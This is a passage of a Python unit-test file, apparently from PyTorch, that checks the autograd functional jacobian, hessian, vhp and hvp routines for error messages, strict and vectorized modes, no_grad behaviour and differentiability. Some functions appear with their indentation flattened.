    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.jacobian(foo, inp, strict=True)
    res = autogradF.jacobian(foo, inp, strict=False)
    self._assert_interleaved_struct(res, foo(inp), inp)
    self.assertEqual(res.abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
        res = autogradF.jacobian(bar, inp, strict=True)
    res = autogradF.jacobian(bar, inp, strict=False)
    # NOTE(review): the structure is checked against foo(inp) even though `res`
    # came from bar -- both outputs have the same shape here, so the check still
    # holds; confirm this was intentional.
    self._assert_interleaved_struct(res, foo(inp), inp)
    self.assertEqual(res.abs().sum(), 0.)

    # The Jacobian does not depend on the input
    def foo(a):
        return a.clone()
    inp.requires_grad_()
    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
        res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
    # Non-strict: identity function, so the jacobian is the identity matrix.
    res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
    self._assert_interleaved_struct(res, inp, inp)
    self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
    """Under torch.no_grad(), jacobian builds no graph unless create_graph=True overrides it."""
    def exp_reducer(x):
        return x.exp().sum(dim=1)
    inputs = torch.rand(4, 4)
    with torch.no_grad():
        res = autogradF.jacobian(exp_reducer, inputs)
    self.assertIsNone(res.grad_fn)
    # The jacobian itself is still computed, not zeroed.
    self.assertNotEqual(res, torch.zeros(4, 4))

    with torch.no_grad():
        # create_graph=True wins over the surrounding no_grad.
        res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
    self.assertIsNotNone(res.grad_fn)
    self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
    """Jacobian structure/graph checks for single input, identity, and multi input."""
    def exp_reducer(x):
        return x.exp().sum(dim=1)
    inputs = torch.rand(4, 4)
    res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
    self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
    self.assertIsNone(res.grad_fn)

    def identity(x):
        return x.clone()
    inputs = torch.rand(4)
    res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
    self._assert_interleaved_struct(res, identity(inputs), inputs)
    self.assertIsNone(res.grad_fn)
    # The jacobian of the identity is the identity matrix.
    self.assertEqual(res, torch.eye(4))

    def add_exp_reducer(x, y):
        return (x + y.exp()).sum(dim=1)
    inputs = (torch.rand(4, 4), torch.rand(4, 4))
    res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
    self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
    self.assertIsNone(res[0].grad_fn)
    self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
    """Output checks for the default (non-vectorized) jacobian path."""
    self._test_jacobian_output(False)
def test_jacobian_output_vectorize(self):
    """Output checks for the vectorized jacobian path."""
    self._test_jacobian_output(True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
    """Scalar-shape checks for the default (non-vectorized) jacobian path."""
    self._test_jacobian_scalar(False)
def test_jacobian_scalar_vectorize(self):
    """Scalar-shape checks for the vectorized jacobian path."""
    self._test_jacobian_scalar(True)
def _test_jacobian_create_graph(self, vectorize):
    """With create_graph=True the jacobian is itself differentiable; verified via (grad)gradcheck."""
    def exp_reducer(x):
        return x.exp().sum(dim=1)
    inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
    res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
    self.assertIsNotNone(res.grad_fn)

    gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
    gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)

    def add_exp_reducer(x, y):
        return (x + y).exp().sum(dim=1)
    inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
              torch.rand(4, 4, dtype=torch.double, requires_grad=True))
    res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
    gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)

    def foo(x, y):
        # Compose the jacobian into a larger differentiable expression.
        x = x.cos()
        # Single output, two inputs: jacobian returns one block per input.
        val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)

        res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
        res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
        return res

    gradcheck(foo, inputs)
    gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
    """create_graph checks for the default (non-vectorized) jacobian path."""
    self._test_jacobian_create_graph(False)
def test_jacobian_create_graph_vectorize(self):
    """create_graph checks for the vectorized jacobian path."""
    self._test_jacobian_create_graph(True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
    """Single input, single elementwise output."""
    def scaled_square(x):
        return 3 * x ** 2

    self._check_jacobian_vectorize_correctness(scaled_square, torch.randn(2, 3, 5))
def test_jacobian_vectorize_correctness_multi_input(self):
    """Two inputs combined through a matmul."""
    def combine(x, y):
        return (x.cos() * x) @ y.sin()

    lhs = torch.randn(2, 3)
    rhs = torch.randn(3, 5)
    self._check_jacobian_vectorize_correctness(combine, (lhs, rhs))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
    """Two inputs, three outputs of differing shapes."""
    def combine(x, y):
        return (x * x) @ y, x @ (x.sum(1) * y), y.sum()

    lhs = torch.randn(5, 3)
    rhs = torch.randn(3, 5)
    self._check_jacobian_vectorize_correctness(combine, (lhs, rhs))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
    """Outputs that each depend on only one of the inputs."""
    def passthrough(x, y):
        return x, y, x, y

    self._check_jacobian_vectorize_correctness(passthrough, (torch.randn(2), torch.randn(3)))
def test_jacobian_vectorize_correctness_zero_dim(self):
    """Zero-dim outputs, zero-dim inputs, and a mix of both."""
    # zero-dim output
    def scalar_outs(x, y):
        return x.sum(), y.sum(), x * y

    self._check_jacobian_vectorize_correctness(scalar_outs, (torch.randn(3), torch.randn(3)))

    # zero-dim input
    def stack_three(x):
        return torch.stack([x, x, x])

    self._check_jacobian_vectorize_correctness(stack_three, torch.randn([]))

    # Mixed zero-dim input / zero-dim output
    def mixed(x, y):
        return y.sum(), x * y

    self._check_jacobian_vectorize_correctness(mixed, (torch.randn([]), torch.randn(1)))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
    """Outputs on different devices (CPU and CUDA) from the same inputs."""
    def f(x, y):
        return x * y, (x * y).cuda()
    x = torch.randn(3)
    y = torch.randn(3)
    self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
    """Outputs of different dtypes from the same inputs."""
    def cast_both(x, y):
        return (x * y).float(), (x * y).double()

    self._check_jacobian_vectorize_correctness(cast_both, (torch.randn(3), torch.randn(3)))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
    """Single-input scalar function."""
    def scaled_square_sum(x):
        return (3 * x ** 2).sum()

    self._check_hessian_vectorize_correctness(scaled_square_sum, torch.randn(2, 3, 5))
def test_hessian_vectorize_correctness_multi_input(self):
    """Scalar function of three matrix inputs."""
    def chained(x, y, z):
        return ((x.relu() * x) @ y.sin() @ z).sum()

    a = torch.randn(2, 3)
    b = torch.randn(3, 5)
    c = torch.randn(5, 5)
    self._check_hessian_vectorize_correctness(chained, (a, b, c))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
    """Hessian when the scalar output ignores some (or all) of the inputs."""
    # output unrelated to one input
    def f(x, y):
        return (x ** 2).sum()
    x = torch.randn(2)
    y = torch.randn(3)
    self._check_hessian_vectorize_correctness(f, (x, y))

    # output unrelated to all inputs
    def f(x, y):
        # NOTE(review): returns a fresh randn each call -- works here because
        # the hessian of an input-independent output is zero either way.
        return torch.randn([])
    x = torch.randn(2)
    y = torch.randn(3)
    self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
    """hessian input/output validation plus structure checks for one and two inputs."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()
    def bar(a):
        # Non-Tensor in the output: invalid.
        return 3 * a.narrow(0, 0, 3), "bar"
    def bar2(a):
        # Non-scalar Tensor output: invalid for hessian.
        return 3 * a.narrow(0, 0, 3)
    def bar3(a):
        # Multiple Tensor outputs: invalid for hessian.
        return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
    inp = torch.rand(4)
    with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
        res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
        res = autogradF.hessian(bar, inp, vectorize=vectorize)
    err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
    with self.assertRaisesRegex(RuntimeError, err_msg_out):
        res = autogradF.hessian(bar2, inp, vectorize=vectorize)
    with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
        res = autogradF.hessian(bar3, inp, vectorize=vectorize)

    # Valid single-input call: hessian interleaves the input shape with itself.
    res = autogradF.hessian(foo, inp, vectorize=vectorize)
    self._assert_interleaved_struct(res, inp, inp)

    def foo(a, b):
        return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
    inp = (torch.rand(4), torch.rand(5))
    res = autogradF.hessian(foo, inp, vectorize=vectorize)
    self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
    """Error checks for hessian() on the non-vectorized path."""
    self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
    """Error checks for hessian() on the vectorized path."""
    self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
    """strict=True in hessian() must raise when the graph is disconnected or linear."""
    def foo(a):
        return a.detach().sum()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone().sum()

    def bar2(a):
        # A Linear function for which the jacobian is independent of the input
        return (3 * a).sum()

    inp = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.hessian(foo, inp, strict=True)
    # With strict=False the same case silently yields an all-zero hessian
    res = autogradF.hessian(foo, inp, strict=False)
    self._assert_interleaved_struct(res, inp, inp)
    self.assertEqual(res.abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
        res = autogradF.hessian(bar, inp, strict=True)
    res = autogradF.hessian(bar, inp, strict=False)
    self._assert_interleaved_struct(res, inp, inp)
    self.assertEqual(res.abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
        res = autogradF.hessian(bar2, inp, strict=True)
    res = autogradF.hessian(bar2, inp, strict=False)
    self._assert_interleaved_struct(res, inp, inp)
    self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
    """hessian() without create_graph returns detached Tensors (single and multi input)."""
    def pow_reducer(x):
        return x.pow(3).sum()

    single = torch.rand(2, 2)
    hess = autogradF.hessian(pow_reducer, single, vectorize=vectorize)
    self._assert_interleaved_struct(hess, single, single)
    self.assertIsNone(hess.grad_fn)

    def add_pow_reducer(x, y):
        return (x + y).pow(3).sum()

    pair = (torch.rand(2, 2), torch.rand(2, 2))
    hess = autogradF.hessian(add_pow_reducer, pair, vectorize=vectorize)
    self._assert_interleaved_struct(hess, pair, pair)
    for row in hess:
        for entry in row:
            self.assertIsNone(entry.grad_fn)
def test_hessian_output(self):
    """Output structure checks for hessian(), non-vectorized path."""
    self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
    """Output structure checks for hessian(), vectorized path."""
    self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
    """hessian() on 0-dim inputs and on outputs that were reshaped to non-scalar."""
    def total(x):
        return x.sum()

    mat = torch.rand(4, 4)
    res = autogradF.hessian(total, mat, vectorize=vectorize)
    self._assert_interleaved_struct(res, mat, mat)

    scalar = torch.rand([])
    res = autogradF.hessian(total, scalar, vectorize=vectorize)
    self._assert_same_struct(res, scalar)

    def reshaped_total(x):
        return x.sum().view(1, 1, 1)

    mat = torch.rand(4, 4)
    res = autogradF.hessian(reshaped_total, mat, vectorize=vectorize)
    self._assert_interleaved_struct(res, mat, mat)
def test_hessian_scalar(self):
    """Scalar-input checks for hessian(), non-vectorized path."""
    return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
    """Scalar-input checks for hessian(), vectorized path."""
    return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
    """hessian() with create_graph=True is itself differentiable (checked via gradcheck)."""
    def pow_reducer(x):
        return x.pow(3).sum()

    inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
    res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, inputs, inputs)
    self.assertIsNotNone(res.grad_fn)

    gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
    gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)

    def add_pow_reducer(x, y):
        return (x + y).pow(3).sum()

    inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
              torch.rand(2, 2, dtype=torch.double, requires_grad=True))
    res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, inputs, inputs)
    self.assertIsNotNone(res[0][0].grad_fn)
    self.assertIsNotNone(res[0][1].grad_fn)
    self.assertIsNotNone(res[1][0].grad_fn)
    self.assertIsNotNone(res[1][1].grad_fn)

    def flatten(inp):
        # Flatten the tuple-of-tuples hessian into a flat tuple for gradcheck
        return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)

    gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
    gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)

    def foo(x, y):
        x = x.cos()
        # NOTE(review): hessian() returns only the hessian (a 2x2 tuple-of-tuples here);
        # "val"/"hess" are its two rows, not a (value, hessian) pair — names are misleading.
        val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)

        res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
        res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
        return res

    gradcheck(foo, inputs)
    gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
    """create_graph checks for hessian(), non-vectorized path."""
    self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
    """create_graph checks for hessian(), vectorized path."""
    self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
    """Check the error messages raised by vhp() for invalid inputs, outputs and v."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    def bar(a):
        # Invalid: returns a non-Tensor in the output tuple
        return 3 * a.narrow(0, 0, 3), "bar"

    def bar2(a):
        # Invalid: output Tensor has more than one element
        return 3 * a.narrow(0, 0, 3)

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
        res = autogradF.vhp(foo, (inp, 2), v)

    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
        res = autogradF.vhp(bar, inp, v)

    err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
    with self.assertRaisesRegex(RuntimeError, err_msg_out):
        res = autogradF.vhp(bar2, inp, v)

    with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
        res = autogradF.vhp(foo, inp, torch.rand(5))

    with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
        res = autogradF.vhp(foo, inp, (v, 2))

    # Valid single-input call
    res = autogradF.vhp(foo, inp, v)
    self._assert_same_struct(res[1], inp)

    def foo(a, b):
        return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()

    # Valid two-input call
    inp = (torch.rand(4), torch.rand(5))
    v = (torch.rand(4), torch.rand(5))
    res = autogradF.vhp(foo, inp, v)
    self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
    """strict=True in vhp() must raise when the graph is disconnected or linear."""
    def foo(a):
        return a.detach().sum()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone().sum()

    def bar2(a):
        # A Linear function for which the jacobian is independent of the input
        return (3 * a).sum()

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.vhp(foo, inp, v, strict=True)
    # strict=False silently yields a zero vhp in each failing case
    res = autogradF.vhp(foo, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
        res = autogradF.vhp(bar, inp, v, strict=True)
    res = autogradF.vhp(bar, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
        res = autogradF.vhp(bar2, inp, v, strict=True)
    res = autogradF.vhp(bar2, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
    """vhp() returns a detached (output, vhp) pair for single- and multi-input functions."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    out, vhp_val = autogradF.vhp(foo, inputs, v)
    self._assert_same_struct(vhp_val, inputs)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(vhp_val.grad_fn)

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()

    inputs = (torch.rand(3), torch.rand(4))
    v = (torch.ones(3), torch.ones(4))
    out, vhp_val = autogradF.vhp(bar, inputs, v)
    self._assert_same_struct(vhp_val, inputs)
    self.assertIsNone(out.grad_fn)
    for g in vhp_val:
        self.assertIsNone(g.grad_fn)
def test_vhp_scalar(self):
    """vhp() with 0-dim inputs; v may be omitted for a single-element input."""
    def total(x):
        return x.sum()

    mat = torch.rand(4, 4)
    mat_v = torch.ones(4, 4)
    res = autogradF.vhp(total, mat, mat_v)
    self._assert_same_struct(res[1], mat)

    scalar = torch.rand([])
    scalar_v = torch.rand([])
    res = autogradF.vhp(total, scalar, scalar_v)
    self._assert_same_struct(res[1], scalar)
    # v defaults to None, which is valid for a single-element input
    res = autogradF.vhp(total, scalar)
    self._assert_same_struct(res[1], scalar)

    def reshaped_total(x):
        return x.sum().view(1, 1, 1)

    mat = torch.rand(4, 4)
    mat_v = torch.rand(4, 4)
    res = autogradF.vhp(reshaped_total, mat, mat_v)
    self._assert_same_struct(res[1], mat)
def test_vhp_create_graph(self):
    """vhp() with create_graph=True is differentiable w.r.t. both inputs and v."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
    v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
    res = autogradF.vhp(foo, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()

    inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
              torch.rand(4, dtype=torch.double, requires_grad=True))
    v = (torch.ones(3, dtype=torch.double, requires_grad=True),
         torch.ones(4, dtype=torch.double, requires_grad=True))
    out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
    self._assert_same_struct(vhp_val, inputs)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(vhp_val[0].grad_fn)
    self.assertIsNotNone(vhp_val[1].grad_fn)

    # args[:2] are the function inputs, args[2:] is v
    gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)

    def foo(*args):
        x, y = args[:2]
        v = args[2:]

        x = x.cos()
        val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)

        return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()

    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
    """Check the error messages raised by hvp() for invalid inputs, outputs and v.

    Mirrors test_vhp_err_check. A stray duplicate ``res = autogradF.hvp(foo, inp, v)``
    used to run before the error checks; its result was never used and the identical
    call is validated below, so it was removed.
    """
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    def bar(a):
        # Invalid: returns a non-Tensor in the output tuple
        return 3 * a.narrow(0, 0, 3), "bar"

    def bar2(a):
        # Invalid: output Tensor has more than one element
        return 3 * a.narrow(0, 0, 3)

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
        res = autogradF.hvp(foo, (inp, 2), v)

    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
        res = autogradF.hvp(bar, inp, v)

    err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
    with self.assertRaisesRegex(RuntimeError, err_msg_out):
        res = autogradF.hvp(bar2, inp, v)

    with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
        res = autogradF.hvp(foo, inp, torch.rand(5))

    with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
        res = autogradF.hvp(foo, inp, (v, 2))

    # Valid single-input call
    res = autogradF.hvp(foo, inp, v)
    self._assert_same_struct(res[1], inp)

    def foo(a, b):
        return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()

    # Valid two-input call
    inp = (torch.rand(4), torch.rand(5))
    v = (torch.rand(4), torch.rand(5))
    res = autogradF.hvp(foo, inp, v)
    self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
    """strict=True in hvp() must raise when the graph is disconnected or linear."""
    def foo(a):
        return a.detach().sum()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone().sum()

    def bar2(a):
        # A Linear function for which the jacobian is independent of the input
        return (3 * a).sum()

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.hvp(foo, inp, v, strict=True)
    # strict=False silently yields a zero hvp in each failing case
    res = autogradF.hvp(foo, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
        res = autogradF.hvp(bar, inp, v, strict=True)
    res = autogradF.hvp(bar, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
        res = autogradF.hvp(bar2, inp, v, strict=True)
    res = autogradF.hvp(bar2, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
    """hvp() returns a detached (output, hvp) pair for single- and multi-input functions."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    out, hvp_val = autogradF.hvp(foo, inputs, v)
    self._assert_same_struct(hvp_val, inputs)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(hvp_val.grad_fn)

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()

    inputs = (torch.rand(3), torch.rand(4))
    v = (torch.ones(3), torch.ones(4))
    out, hvp_val = autogradF.hvp(bar, inputs, v)
    self._assert_same_struct(hvp_val, inputs)
    self.assertIsNone(out.grad_fn)
    for g in hvp_val:
        self.assertIsNone(g.grad_fn)
def test_hvp_scalar(self):
    """hvp() with 0-dim inputs; v may be omitted for a single-element input."""
    def exp_reducer(x):
        return x.exp().sum()

    mat = torch.rand(4, 4)
    mat_v = torch.ones(4, 4)
    res = autogradF.hvp(exp_reducer, mat, mat_v)
    self._assert_same_struct(res[1], mat)

    scalar = torch.rand([])
    scalar_v = torch.rand([])
    res = autogradF.hvp(exp_reducer, scalar, scalar_v)
    self._assert_same_struct(res[1], scalar)
    # v defaults to None, which is valid for a single-element input
    res = autogradF.hvp(exp_reducer, scalar)
    self._assert_same_struct(res[1], scalar)

    def reshaped_reducer(x):
        return x.exp().sum().view(1, 1, 1)

    mat = torch.rand(4, 4)
    mat_v = torch.rand(4, 4)
    res = autogradF.hvp(reshaped_reducer, mat, mat_v)
    self._assert_same_struct(res[1], mat)
def test_hvp_create_graph(self):
    """hvp() with create_graph=True is differentiable w.r.t. both inputs and v."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
    v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
    res = autogradF.hvp(foo, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()

    inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
